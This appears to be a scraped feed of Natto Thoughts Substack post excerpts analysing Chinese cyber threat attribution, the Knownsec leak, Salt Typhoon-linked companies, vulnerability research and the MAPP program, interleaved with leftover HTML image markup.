https://substackcdn.com/image/fetch/$s_!6kZQ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" style="height:20px;width:20px" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div>To defend systems, one must first pinpoint the source of malicious activity. Most cyber threat intelligence (CTI) firms focus on tactical and operational attribution: tactical attribution identifies and clusters technical details such as malware used, attack methods, or indicators of compromise, while operational attribution uses characteristics of activity clusters to infer group profiles and assigns labels like “APT” or “UNC.”<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> Strategic attribution goes further by identifying the real-world individuals or entities behind an intrusion.Some CTI experts <a href="https://www.robertmlee.org/the-problems-with-seeking-and-avoiding-true-attribution-to-cyber-attacks/">debate</a> the conditions under which strategic attribution is appropriate, while others <a href="https://www.uclalawreview.org/wp-content/uploads/securepdfs/2020/09/Eichensehr-67-3.pdf">highlight</a> the technical challenges of identifying threat actors, the political motivations behind public disclosure, and the legal standards required to assign responsibility. The Natto Team and <a href="https://www.amazon.com/Attribution-Advanced-Persistent-Threats-cyber-espionage/dp/3662613123">other</a> researchers believe that – compared to “cluster-based” tactical and operational attribution – the strategic identification of real-world individuals and o… <a href="https://www.nattothoughts.com/p/the-many-arms-of-the-mss-why-provincial"> Read more </a>
Knownsec: The King of Vulnerability Missed Three Vulnerabilities of Its Own

Wed, 03 Dec 2025 17:02:43 -0000

The leak incident involving Chinese cybersecurity firm Knownsec shows the company’s seemingly transparent crisis management strategy and underscores its position in the industry, but mysteries remain.

On November 5, 2025, a Chinese-language blog called <a href="https://archive.li/NNsWb#selection-347.3-347.169">Mrxn’s Blog</a> published a “massive” leak of information from Knownsec (知道创宇), a Chinese cybersecurity company. Mrxn claimed that the leak included 12,000 confidential documents, such as “China’s state-level cyber weapons, internal tool systems, and global target lists.” The blog provided sample screenshots of the leak and noted that the leaked information first appeared on the code-sharing platform GitHub, which subsequently removed it “for violating its terms of service.” The <a href="https://netaskari.substack.com/p/knownsec-breach-what-we-know-so-far">NETASKARI</a> Substack was among the first outlets to report in English on Mrxn’s blog post about the leak. <a href="https://netaskari.substack.com/p/knownsec-breach-what-we-know-so-far">NETASKARI</a>’s author, a freelance journalist based in Amsterdam, The Netherlands, provided a summary and analysis of the limited available leaked documents—including screenshots of product brochures, data collection lists, and a Knownsec company profile—and concluded there was no “smoking gun” or evidence of state-of-the-art tools used by Chinese state hackers. H… <a href="https://www.nattothoughts.com/p/knownsec-the-king-of-vulnerability"> Read more </a>
China’s Cybersecurity Companies Advancing Offensive Cyber Capabilities Through Attack-Defense Labs

Wed, 19 Nov 2025 17:03:09 -0000

Private-sector attack-defense labs form a core pillar of how China builds, sustains, and operationalizes cyber capability for commercial purposes and state-linked cyber operations.

Western governments are grappling with how private-sector offensive cyber capabilities should fit into state operations. This raises a number of practical <a href="https://www.govtech.com/blogs/lohrmann-on-cybersecurity/cyber-privateers-the-return-of-the-hack-back-debate">questions</a>: If a state tasked a company with carrying out cyber operations against an adversary, who inside those organizations would actually carry out offensive work?<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> How would these units be structured for government tasks? And how would offensive activity coexist with a company’s day-to-day R&D and commercial operations?In China, these questions are far less abstract. Private companies have been core contributors to national cyber capability building for years, supported by both policy and institutional design. They develop many of the tools, techniques, and forms of expertise that underpin defensive security products and can also be leveraged for state-sponsored cyber operations. The clearest organizational expression of this approach is companies’ widespread use of attack-defense labs (攻防实验室), internal units that merge defensiv… <a href="https://www.nattothoughts.com/p/chinas-cybersecurity-companies-advancing"> Read more </a>
A Researcher Came Knocking, and Taught China a Lesson in How to Manage Vulnerabilities -- and Researchers

Wed, 05 Nov 2025 17:02:57 -0000

A TCL TV vulnerability disclosure drove home the message: to protect its economic and political clout, China must heed global vulnerability researchers' warnings and cultivate Chinese researchers

In the last few days of October 2025 in Asia, <a href="https://www.youtube.com/watch?v=6wU7nfqJ2SI">gift-giving</a> between top political leaders has drawn a lot of attention—and <a href="https://www.youtube.com/watch?v=1KdW6wjfTCY&t=56s">laughter</a>. One moment, which surprised many of us, was when Chinese President Xi Jinping showed humor during his gift exchange with South Korean President Lee Jae Myung. It is rare to see a Chinese leader “<a href="https://www.nytimes.com/2025/11/02/world/asia/xi-jinping-china-south-korea-spying.html">speaking off the cuff in public</a>.” On this occasion, President Xi joked about backdoors in cellphones—yes, <a href="https://csrc.nist.gov/glossary/term/backdoor">backdoors</a> that can monitor or access the information in mobile devices.During his first <a href="https://web.archive.org/web/20251104150038/https:/www.fmprc.gov.cn/eng/xw/zyxw/202511/t20251101_11745458.html">state visit</a> to South Korea after 11 years, Xi presented two Chinese-made Xiaomi brand smartphones—the world’s <a href="https://counterpointresearch.com/en/insights/global-smartphone-share">third-largest</a> smartphone brand—to South Korean President Lee Jae Myung. When Lee asked delightedly about the quality of communication and the security of the phone, Xi smiled and said, “You can check if there is a backdoor.”President Xi is undoubtedly fully aware that the United States and its allies have warned that Chinese technology may contain <a href="https://selectcommitteeontheccp.house.gov/media/press-releases/gallagher-urges-us-navy-exchange-remove-ccp-linked-computers-stores">backdoors</a>—what the … <a href="https://www.nattothoughts.com/p/what-a-narrative-control-failure"> Read more </a>
Beyond the Aliases: Decoding Chinese Threat Group Attribution and the Human Factor

Wed, 22 Oct 2025 16:02:27 -0000

Examining the overlap between APT27, HAFNIUM, and Silk Typhoon through recent U.S. government disclosures, and why understanding the humans behind the keyboard is important for cyber defenders

Since March 2025, the U.S. government has exposed Chinese hackers and entities linked to threat groups publicly tracked as APT27, HAFNIUM, Silk Typhoon, and other threat group monikers. Among these named Advanced Persistent Threat (APT) groups, technical analysis and observed intrusion activities from the cybersecurity community have provided group tracking criteria and measures to mitigate harm and to eradicate malware from systems and networks. Because cybersecurity firms often use different threat models, have their own standards for clustering intrusions, and closely guard their <a href="https://www.proofpoint.com/us/threat-reference/telemetry">telemetry data</a>—often not sharing with others—we see threat groups labeled with a number of “a.k.a.” (also known as) group names. For example, the <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/apt27">profile of APT27</a> on Malpedia, a community-curated online malware encyclopedia and resource, lists 16 a.k.a. group names. How do these a.k.a. groups overlap? How are they different from one another? The answers are not always clear.Additionally, when law enforceme… <a href="https://www.nattothoughts.com/p/beyond-the-aliases-decoding-chinese"> Read more </a>
China’s Vulnerability Research: What’s Different Now?

Wed, 08 Oct 2025 16:02:33 -0000

China’s bug-hunting scene is maturing - more players, bigger prizes, tighter structure, and a growing focus on domestic products, driven by profit, prestige, and national security.

Over the past two decades, China’s vulnerability research ecosystem has undergone a dramatic transformation. <a href="https://nattothoughts.substack.com/p/no-ranges-no-bounties-no-contests">In the early 2000s</a>, it was a fragmented landscape of free databases and easily accessible, low-cost exploits. Over time, it evolved toward commercialization, with organized vulnerability markets and institutional research labs emerging within major tech and cybersecurity companies.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> By the mid-2010s, Chinese hackers were <a href="https://ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/pdfs/cyber-report-2024-from-vegas-to-chengdu.pdf">competing – and excelling –</a> in global exploit hacking contests<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a> and bug bounty programs<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-3" href="#footnote-3" target="_self">3</a> to identify weak spots in Western products.As this ecosystem has evolved, the Chinese state moved to harness the vulnerability research for national priorities through both formal and informal channels. From the top down, it imposed institutional mechanisms such as direct oversight of researchers and regulations that mandate or incentivize reporting to state-run entities. From the bottom up, informal networks among prominent researchers, who exchange insights and acquisition o… <a href="https://www.nattothoughts.com/p/chinas-vulnerability-research-whats"> Read more </a>
Who is Salt Typhoon Really? Unraveling the Attribution Challenge

Wed, 24 Sep 2025 16:08:09 -0000

How overlapping APT groups and Chinese companies complicate attribution in state cyber operations

Our <a href="https://nattothoughts.substack.com/p/salt-typhoon-new-joint-advisory-offers">previous post</a> about Salt Typhoon provided an initial commentary on the <a href="https://media.defense.gov/2025/Aug/22/2003786665/-1/-1/0/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.PDF">Joint Cybersecurity Advisory</a> on Salt Typhoon issued on August 27, 2025. The advisory identified three Chinese companies - <a href="https://nattothoughts.substack.com/i/155370638/sichuan-juxinhes-area-of-focus-communication-system-services-aligns-with-salt-typhoon-targeting">Sichuan Juxinhe Network Technology Co. Ltd</a>. (四川聚信和网络科技有限公司), <a href="https://nattothoughts.substack.com/i/173242203/beijing-huanyu-tianqiong-as-a-front-company-changing-business-scopes-to-meet-client-needs">Beijing Huanyu Tianqiong Information Technology Co., Ltd</a><a href="https://nattothoughts.substack.com/i/173242203/beijing-huanyu-tianqiong-as-a-front-company-changing-business-scopes-to-meet-client-needs">.</a> (北京寰宇天穹信息技术有限公司), and <a href="https://nattothoughts.substack.com/i/173242203/sichuan-zhixin-ruijie-as-a-real-business-lacking-a-company-webpage-but-engaged-in-dedicated-contract-work">Sichuan Zhixin Ruijie Network Technology Co., Ltd</a>. (四川智信锐捷网络科技有限公司) - as suppliers of products and services to Salt Typhoon and other overlapping groups such as OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor. After examining these three Chinese companies and their possible roles in Salt Typhoon-related cyber operations, we presented a few questions worth further exploration. In this post, we will address questions about the involvement of Chinese companies in state-sponsored cyber operations and share some observations on threat attribution from the joint advisory.<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!gpjA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!gpjA!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 424w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 848w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 1272w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!gpjA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png" width="645" height="469" data-attrs="{"src":"https://substack-post-media.s3.amazonaws.com/public/images/06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":469,"width":645,"resizeWidth":null,"bytes":291965,"alt":null,"title":null,"type":"image/png","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":"https://nattothoughts.substack.com/i/174415649?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png","isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!gpjA!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 424w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 848w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 1272w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" style="height:20px;width:20px" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h1>First, an update: The Company Webpage of Sichuan Zhixin Ruijie is Found</h1>Previously, the… <a href="https://www.nattothoughts.com/p/who-is-salt-typhoon-really-unraveling"> Read more </a>
Salt Typhoon: New Joint Advisory Offers a Beacon Through the Storm but Stirs Up New Questions

Wed, 10 Sep 2025 16:03:20 -0000

Analysis of newly identified Salt Typhoon-linked companies casts light on the complex ecosystem of front companies and real businesses supporting Chinese state cyber operations

<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ctsD!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ctsD!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 424w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 848w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ctsD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png" width="1456" height="971" data-attrs="{"src":"https://substack-post-media.s3.amazonaws.com/public/images/c8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":971,"width":1456,"resizeWidth":null,"bytes":2082888,"alt":null,"title":null,"type":"image/png","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":"https://nattothoughts.substack.com/i/173242203?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png","isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ctsD!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 424w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 848w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" style="height:20px;width:20px" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Source: ChatGPT image</figcaption></figure></div>On August 27, 2025, the United States and 22 government agencies from 13 countries issued a <a href="https://media.defense.gov/2025/Aug/22/2003786665/-1/-1/0/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.PDF">Cybersecurity Advisory</a> entitled, “Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System.” The advisory outlined the tactics, techniques, and procedures (TTPs) employed by advanced persistent threat (APT) actors whose activity partially overlaps with activity grouped under names such as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor.The document identified three Chinese companies—Sichuan Juxinhe Network Technology Co. Ltd. (四川聚信和网络科技有限公司), Beijing Huanyu Tianqiong Information Technology Co., Ltd. (北京寰宇天穹信息技术有限公司), and Sichuan Zhixin Ruijie Network Technology Co., Ltd. (四川智信锐捷网络科技有限公司)—that have supported these APT activities globally since at least 2021. These organizations reportedly supplied cyber-related products and services to China’s intelligence entities, including units within the People’s Liberat… <a href="https://www.nattothoughts.com/p/salt-typhoon-new-joint-advisory-offers"> Read more </a>
No Ranges, No Bounties, No Contests: Forging Offensive Capabilities in China’s 2000s Hacker Scene

Wed, 27 Aug 2025 16:03:08 -0000

China’s early hacking training grounds weren’t classrooms or hacking contests, but online forums, real-world targets, and freely shared offensive tools and vulnerabilities.

<pre><code>This post is adapted from the Cyberdefense Report <a href="https://ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/pdfs/before-vegas-cyberdefense-report.pdf">"Before Vegas: The ‘Red Hackers’ Who Shaped China’s Cyber Ecosystem,"</a> published in July 2025 by the Center for Security Studies (CSS) at ETH Zurich, Switzerland.</code></pre>In our <a href="https://nattothoughts.substack.com/p/few-and-far-between-during-chinas">last piece</a>, we showed how truly elite offensive cyber talent has always been scarce, even within China’s massive hacker communities of the 2000s. But how did this small circle of talent actually develop offensive capabilities? In China, these fall under the broader category of “live-fire” capabilities (实战能力),<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> i.e. the ability to apply tools and techniques such as penetration testing, security operations, and incident response. As we discussed <a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking">here</a>, <a href="https://nattothoughts.substack.com/p/business-priorities-of-chinese-cyber">here</a>, and <a href="https://nattothoughts.substack.com/p/butian-vulnerability-platform-forging">here</a>, hacking contests, bug bounty platforms, and cyber ranges have become core pillars of China’s modern live-fire talent pipeline. Today, these mechanisms are deeply institutionalized across universities, companies, and state-backed initiatives, serving as the backbone for identifying and training skilled operators. <a href="https://www.nattothoughts.com/p/no-ranges-no-bounties-no-contests"> Read more </a>
Few and Far Between: During China’s Red Hacker Era, Patriotic Hacktivism Was Widespread—Talent Was Not

Wed, 13 Aug 2025 16:02:26 -0000

Inside the small, elite circles that powered China’s massive hacker communities in the late 1990s and 2000s.

<pre><code>This post is excerpted from the Cyberdefense Report <a href="https://css.ethz.ch/en/center/CSS-news/2025/07/before-vegas-the-red-hackers-who-shaped-chinas-cyber-ecosystem.html">"Before Vegas: The ‘Red Hackers’ Who Shaped China’s Cyber Ecosystem,"</a> published in July 2025 by the Center for Security Studies (CSS) at ETH Zurich, Switzerland.</code></pre>Truly elite offensive cyber talent has always been rare. Despite the growth of cybersecurity communities worldwide, and the emergence of extensive and structured talent pipelines in countries like China – examined in Natto pieces<a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking"> 1</a>,<a href="https://nattothoughts.substack.com/p/when-a-vocational-college-becomes"> 2</a> and<a href="https://nattothoughts.substack.com/p/debating-chinas-ai-path-alternative"> 3</a> – which have made high-quality talent more widely available, truly exceptional individuals remain scarce and highly sought after.As early as 2013, the<a href="https://www.airuniversity.af.edu/CASI/Display/Article/2485204/plas-science-of-military-strategy-2013/"> Science of Military Strategy</a>—a foundational text published by the PLA Academy of Military Science—noted that while cyber warfare benefits from a “broad mass base,” the traditional Chinese military ideal of “all people are soldiers” does not translate to cyberspace. Instead, it emphasized that only an “<a href="https://www.bloomsburycollections.com/monograph-detail?docid=b-9798881817602&pdfid=9798881817602.ch-8.pdf&tocid=b-9798881817602-chapter8">extremely lean</a>” cohort possessed the capabilities required for high-level cyber operations.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a>… <a href="https://www.nattothoughts.com/p/few-and-far-between-during-chinas"> Read more </a>
When Privileged Access Falls into the Wrong Hands: Chinese Companies in Microsoft’s MAPP Program

Thu, 31 Jul 2025 16:32:47 -0000

Chinese companies face conflicting pressures between MAPP’s non-disclosure requirements and domestic policies that incentivize or mandate vulnerability disclosure to the state.

On July 25, 2025, Bloomberg <a href="https://www.bloomberg.com/news/articles/2025-07-25/microsoft-sharepoint-hack-probe-on-whether-chinese-hackers-found-flaw-via-alert?srnd=undefined">reported </a>that Microsoft is investigating whether a leak from its Microsoft Active Protections Program (MAPP) allowed Chinese hackers to exploit a SharePoint vulnerability before a patch was released. Microsoft attributed the campaign – dubbed “ToolShell” after the custom remote access trojan used – to three China-linked threat actors: Linen Typhoon, Violet Typhoon, and Storm-2603. The attackers reportedly compromised over 400 organizations worldwide, including the U.S. National Nuclear Security Administration.Launched in 2008, MAPP is designed to reduce the time between the discovery of a vulnerability and the deployment of patches. By giving trusted security vendors early access to technical details about upcoming patches, Microsoft enables them to release protections (such as antivirus signatures and intrusion detection rules) in sync with its monthly updates. The program, however, relies on strict compliance with non-disclosure agreements and the secure … <a href="https://www.nattothoughts.com/p/when-privileged-access-falls-into"> Read more </a>
HAFNIUM-Linked Hacker Xu Zewei: Riding the Tides of China’s Cyber Ecosystem

Wed, 23 Jul 2025 16:01:48 -0000

How one man’s career reveals the interconnected web of China’s state security apparatus, cybersecurity firms, and strategic industries

On July 3, 2025, at Milan Malpensa Airport, <a href="https://www.ansa.it/english/newswire/english_service/2025/07/07/ansachinese-spy-arrested-in-italy-on-us-warrant_9f5bbfe6-74ef-4f78-bb1e-fcf01f755652.html">Italian police arrested</a> Xu Zewei (徐泽伟), whom U.S. authorities allege to be a hacker contracted by the Chinese state. Following the news about Xu’s arrest from Italian media, on July 8, the U.S. Department of Justice (US DoJ) issued a <a href="https://www.justice.gov/opa/pr/justice-department-announces-arrest-prolific-chinese-state-sponsored-contract-hacker">press release</a> and unsealed an <a href="https://www.justice.gov/opa/media/1407196/dl">indictment</a>, accusing Xu Zewei and his co-defendant Zhang Yu (张宇) of participating in hacking activities between February 2020 and June 2021. These activities were reportedly linked to the Advanced Persistent Threat (APT) group <a href="https://attack.mitre.org/groups/G0125/">HAFNIUM</a> (also known as Silk Typhoon or APT27), involving the theft of COVID-19 research from universities, exploitation of Microsoft Exchange Server vulnerabilities, and compromising thousands of computers worldwide, including those in the United States. As of this writing, Xu remains in custody near Milan and is undergoing extradition proceedings to the United States. During his initial court appearance, <a href="https://www.cnn.com/2025/07/08/politics/us-extradition-chinese-man-accused-hacking-covid-research">Xu asserted</a> that he “has nothing to do with the case,” … <a href="https://www.nattothoughts.com/p/hafnium-linked-hacker-xu-zewei-riding"> Read more </a>
Pick Your Innovation Path in AI: Chinese Edition

Wed, 09 Jul 2025 16:01:31 -0000

China’s advances in AI show the effects of a state approach of “introduce, digest, absorb, re-innovate” and years of debate on the balance between market-driven innovation and state-led development

